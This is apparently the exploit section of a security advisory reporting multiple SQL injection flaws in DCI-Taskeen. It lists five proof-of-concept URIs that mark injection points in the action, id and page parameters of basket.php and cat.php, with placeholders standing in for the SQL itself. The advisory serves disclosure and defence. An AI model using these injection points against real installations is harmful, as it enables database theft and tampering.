• info
• discussion
• exploit
• solution
• references

DCI-Taskeen Multiple SQL Injection Vulnerabilities


These issues can be exploited through use of a web client.

The following proof of concept URI are available:
http://www.example.com/basket.php?action=addex&id=[SQL]
http://www.example.com/basket.php?action=[SQL]
http://www.example.com/basket.php?action=addr&id=[SQL]
http://www.example.com/cat.php?do=cat&page=1&id=[SQL]
http://www.example/cat.php?do=cat&page=[SQL]